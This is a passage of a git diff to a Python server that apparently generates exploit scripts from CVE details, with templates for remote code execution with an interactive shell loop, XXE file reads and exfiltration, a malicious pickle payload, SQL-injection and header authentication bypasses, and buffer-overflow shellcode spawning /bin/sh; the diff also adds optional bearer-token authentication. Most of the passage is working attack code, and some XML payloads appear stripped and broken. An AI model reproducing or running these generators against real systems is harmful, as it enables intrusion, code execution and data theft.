print(f"[+] Found software indicator: {{indicator}}") return True - + except Exception as e: print(f"[-] Error analyzing target: {{e}}") - + return False - + def test_vulnerability(self): """Test for vulnerability presence""" print(f"[+] Testing for {cve_id} vulnerability...") - + # Based on CVE description, generate test cases test_endpoints = [ "/", @@ -7831,29 +7832,29 @@ def test_vulnerability(self): "/api", "/login" ] - + for endpoint in test_endpoints: try: response = self.session.get(f"{{self.target_url}}{{endpoint}}") print(f"[+] {{endpoint}}: {{response.status_code}}") - + # Look for error messages or indicators if response.status_code in [200, 500, 403]: print(f"[+] Endpoint {{endpoint}} accessible") - + except Exception as e: continue - + return True - + def exploit(self): """Attempt exploitation based on CVE details""" print(f"[+] Attempting exploitation of {cve_id}") - + # This would be customized based on the specific CVE print(f"[!] Manual exploitation required for {cve_id}") print(f"[!] Vulnerability details: {{'{description[:200]}...'}}") - + return False def main(): @@ -7861,13 +7862,13 @@ def main(): print(f"Usage: python3 {{sys.argv[0]}} ") print(f"Example: python3 {{sys.argv[0]}} http://target.com") sys.exit(1) - + target_url = sys.argv[1] exploit = GenericExploit(target_url) - + print(f"[+] Generic Exploit for {cve_id}") print(f"[+] Target: {{target_url}}") - + if exploit.analyze_target(): print("[+] Target may be vulnerable") exploit.test_vulnerability() @@ -7882,7 +7883,7 @@ def main(): def _generate_specific_instructions(self, vuln_type, cve_data, target_info, details): """Generate specific usage instructions based on vulnerability type""" cve_id = cve_data.get("cve_id", "") - + base_instructions = f"""# Exploit for {cve_id} # Vulnerability Type: {vuln_type} # Software: {details.get('software', 'Unknown')} {details.get('version', '')} @@ -7952,7 +7953,7 @@ def _generate_specific_instructions(self, vuln_type, cve_data, target_info, deta def _generate_rce_exploit(self, cve_data, target_info, details): """Generate RCE exploit based on CVE details""" cve_id = cve_data.get("cve_id", "") - + return f'''#!/usr/bin/env python3 # Remote Code Execution Exploit for {cve_id} # Vulnerability: {cve_data.get("description", "")[:100]}... @@ -7966,11 +7967,11 @@ class RCEExploit: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() - + def test_rce(self, command="id"): """Test for RCE vulnerability""" print(f"[+] Testing RCE with command: {{command}}") - + # Common RCE payloads payloads = [ # Command injection @@ -7978,19 +7979,19 @@ def test_rce(self, command="id"): f"| {{command}}", f"&& {{command}}", f"|| {{command}}", - + # Template injection f"${{{{{{command}}}}}}", f"{{{{{{command}}}}}}", - + # Deserialization payloads f"{{command}}", - + # OS command injection f"`{{command}}`", f"$({{command}})", ] - + for i, payload in enumerate(payloads): try: # Test GET parameters @@ -7998,27 +7999,27 @@ def test_rce(self, command="id"): self.target_url, params={{"cmd": payload, "exec": payload, "system": payload}} ) - + # Look for command output indicators if self._check_rce_indicators(response.text, command): print(f"[+] RCE found with payload {{i+1}}: {{payload}}") return True - + # Test POST data response = self.session.post( self.target_url, data={{"cmd": payload, "exec": payload, "system": payload}} ) - + if self._check_rce_indicators(response.text, command): print(f"[+] RCE found with POST payload {{i+1}}: {{payload}}") return True - + except Exception as e: continue - + return False - + def _check_rce_indicators(self, response_text, command): """Check response for RCE indicators""" if command == "id": @@ -8029,13 +8030,13 @@ def _check_rce_indicators(self, response_text, command): indicators = ["/", "\\\\", "C:"] else: indicators = [command] - + return any(indicator in response_text for indicator in indicators) - + def execute_command(self, command): """Execute a specific command""" print(f"[+] Executing command: {{command}}") - + if self.test_rce(command): print(f"[+] Command executed successfully") return True @@ -8048,18 +8049,18 @@ def main(): print(f"Usage: python3 {{sys.argv[0]}} [command]") print(f"Example: python3 {{sys.argv[0]}} http://target.com id") sys.exit(1) - + target_url = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "id" - + exploit = RCEExploit(target_url) - + print(f"[+] RCE Exploit for {cve_id}") print(f"[+] Target: {{target_url}}") - + if exploit.test_rce(command): print("[+] RCE vulnerability confirmed!") - + # Interactive shell while True: try: @@ -8080,7 +8081,7 @@ def main(): def _generate_xxe_exploit(self, cve_data, target_info, details): """Generate XXE exploit based on CVE details""" cve_id = cve_data.get("cve_id", "") - + return f'''#!/usr/bin/env python3 # XXE (XML External Entity) Exploit for {cve_id} # Vulnerability: {cve_data.get("description", "")[:100]}... @@ -8092,31 +8093,31 @@ class XXEExploit: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() - + def generate_xxe_payloads(self): """Generate XXE payloads""" payloads = [ # Basic file read '\\n]>\\n&xxe;', - + # Windows file read '\\n]>\\n&xxe;', - + # HTTP request (SSRF) '\\n]>\\n&xxe;', - + # Parameter entity '\\n\\n">\\n%param1;\\n]>\\n&exfil;' ] - + return payloads - + def test_xxe(self): """Test for XXE vulnerability""" print("[+] Testing XXE vulnerability...") - + payloads = self.generate_xxe_payloads() - + for i, payload in enumerate(payloads): try: headers = {{"Content-Type": "application/xml"}} @@ -8125,22 +8126,22 @@ def test_xxe(self): data=payload, headers=headers ) - + # Check for file content indicators indicators = [ "root:", "daemon:", "bin:", # /etc/passwd "localhost", "127.0.0.1", # hosts file "") print(f"Example: python3 {{sys.argv[0]}} http://target.com/xml") sys.exit(1) - + target_url = sys.argv[1] exploit = XXEExploit(target_url) - + print(f"[+] XXE Exploit for {cve_id}") print(f"[+] Target: {{target_url}}") - + if exploit.test_xxe(): print("[+] XXE vulnerability confirmed!") else: @@ -8167,7 +8168,7 @@ def main(): def _generate_deserialization_exploit(self, cve_data, target_info, details): """Generate deserialization exploit based on CVE details""" cve_id = cve_data.get("cve_id", "") - + return f'''#!/usr/bin/env python3 # Deserialization Exploit for {cve_id} # Vulnerability: {cve_data.get("description", "")[:100]}... @@ -8182,51 +8183,51 @@ class DeserializationExploit: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() - + def create_pickle_payload(self, command): """Create malicious pickle payload""" class ExploitPayload: def __reduce__(self): import subprocess return (subprocess.call, ([command], )) - + payload = ExploitPayload() serialized = pickle.dumps(payload) encoded = base64.b64encode(serialized).decode() return encoded - + def test_deserialization(self): """Test for deserialization vulnerabilities""" print("[+] Testing deserialization vulnerability...") - + test_command = "ping -c 1 127.0.0.1" # Safe test command - + # Test different serialization formats payloads = {{ "pickle": self.create_pickle_payload(test_command), "json": json.dumps({{"__type__": "os.system", "command": test_command}}), "java": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAF4" }} - + for format_type, payload in payloads.items(): try: # Test different parameters test_params = ["data", "payload", "object", "serialized"] - + for param in test_params: response = self.session.post( self.target_url, data={{param: payload}} ) - + # Check for deserialization indicators if response.status_code in [200, 500] and len(response.text) > 0: print(f"[+] Potential {{format_type}} deserialization found") return True - + except Exception as e: continue - + return False def main(): @@ -8234,13 +8235,13 @@ def main(): print(f"Usage: python3 {{sys.argv[0]}} ") print(f"Example: python3 {{sys.argv[0]}} http://target.com/deserialize") sys.exit(1) - + target_url = sys.argv[1] exploit = DeserializationExploit(target_url) - + print(f"[+] Deserialization Exploit for {cve_id}") print(f"[+] Target: {{target_url}}") - + if exploit.test_deserialization(): print("[+] Deserialization vulnerability confirmed!") else: @@ -8253,7 +8254,7 @@ def main(): def _generate_auth_bypass_exploit(self, cve_data, target_info, details): """Generate authentication bypass exploit""" cve_id = cve_data.get("cve_id", "") - + return f'''#!/usr/bin/env python3 # Authentication Bypass Exploit for {cve_id} # Vulnerability: {cve_data.get("description", "")[:100]}... @@ -8265,11 +8266,11 @@ class AuthBypassExploit: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() - + def test_sql_auth_bypass(self): """Test SQL injection authentication bypass""" print("[+] Testing SQL injection auth bypass...") - + bypass_payloads = [ "admin' --", "admin' #", @@ -8279,38 +8280,38 @@ def test_sql_auth_bypass(self): "') or '1'='1--", "admin' or '1'='1", ] - + for payload in bypass_payloads: try: data = {{ "username": payload, "password": "anything" }} - + response = self.session.post( f"{{self.target_url}}/login", data=data ) - + # Check for successful login indicators success_indicators = [ "dashboard", "welcome", "logout", "admin panel", "successful", "redirect" ] - + if any(indicator in response.text.lower() for indicator in success_indicators): print(f"[+] SQL injection bypass successful: {{payload}}") return True - + except Exception as e: continue - + return False - + def test_header_bypass(self): """Test header-based authentication bypass""" print("[+] Testing header-based auth bypass...") - + bypass_headers = [ {{"X-Forwarded-For": "127.0.0.1"}}, {{"X-Real-IP": "127.0.0.1"}}, @@ -8318,21 +8319,21 @@ def test_header_bypass(self): {{"X-Forwarded-User": "admin"}}, {{"Authorization": "Bearer admin"}}, ] - + for headers in bypass_headers: try: response = self.session.get( f"{{self.target_url}}/admin", headers=headers ) - + if response.status_code == 200: print(f"[+] Header bypass successful: {{headers}}") return True - + except Exception as e: continue - + return False def main(): @@ -8340,22 +8341,22 @@ def main(): print(f"Usage: python3 {{sys.argv[0]}} ") print(f"Example: python3 {{sys.argv[0]}} http://target.com") sys.exit(1) - + target_url = sys.argv[1] exploit = AuthBypassExploit(target_url) - + print(f"[+] Authentication Bypass Exploit for {cve_id}") print(f"[+] Target: {{target_url}}") - + success = False if exploit.test_sql_auth_bypass(): print("[+] SQL injection authentication bypass confirmed!") success = True - + if exploit.test_header_bypass(): print("[+] Header-based authentication bypass confirmed!") success = True - + if not success: print("[-] No authentication bypass found") @@ -8367,7 +8368,7 @@ def _generate_buffer_overflow_exploit(self, cve_data, target_info, details): """Generate buffer overflow exploit""" cve_id = cve_data.get("cve_id", "") arch = target_info.get("target_arch", "x64") - + return f'''#!/usr/bin/env python3 # Buffer Overflow Exploit for {cve_id} # Architecture: {arch} @@ -8381,14 +8382,14 @@ class BufferOverflowExploit: def __init__(self, target_host, target_port): self.target_host = target_host self.target_port = int(target_port) - + def create_pattern(self, length): """Create cyclic pattern for offset discovery""" pattern = "" for i in range(length): pattern += chr(65 + (i % 26)) # A-Z pattern return pattern - + def generate_shellcode(self): """Generate shellcode for {arch}""" if "{arch}" == "x86": @@ -8403,56 +8404,56 @@ def generate_shellcode(self): "\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73" "\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05" ) - + return shellcode.encode('latin-1') - + def create_exploit(self, offset=140): """Create buffer overflow exploit""" print(f"[+] Creating buffer overflow exploit...") print(f"[+] Offset: {{offset}} bytes") - + # Pattern to reach return address padding = "A" * offset - + if "{arch}" == "x86": # x86 return address (example) ret_addr = struct.pack(" ") print(f"Example: python3 {{sys.argv[0]}} 192.168.1.100 9999") sys.exit(1) - + target_host = sys.argv[1] target_port = sys.argv[2] - + exploit = BufferOverflowExploit(target_host, target_port) - + print(f"[+] Buffer Overflow Exploit for {cve_id}") print(f"[+] Target: {{target_host}}:{{target_port}}") print(f"[+] Architecture: {arch}") - + # Create and send exploit payload = exploit.create_exploit() exploit.send_exploit(payload) @@ -9020,6 +9021,22 @@ def list_files(self, directory: str = ".") -> Dict[str, Any]: # API Routes +@app.before_request +def optional_bearer_auth(): + # If no token is configured, allow all requests + if not API_TOKEN: + return + + auth_header = request.headers.get("Authorization", "") + prefix = "Bearer " + + if not auth_header.startswith(prefix): + abort(401, description="Unexpected authorization header format") + + token = auth_header[len(prefix):] + if token != API_TOKEN: + abort(401, description="Unauthorized!") + @app.route("/health", methods=["GET"]) def health_check(): """Health check endpoint with comprehensive tool detection""" @@ -17286,4 +17303,4 @@ def get_alternative_tools(): if line.strip(): logger.info(line) - app.run(host="0.0.0.0", port=API_PORT, debug=DEBUG_MODE) + app.run(host=API_HOST, port=API_PORT, debug=DEBUG_MODE)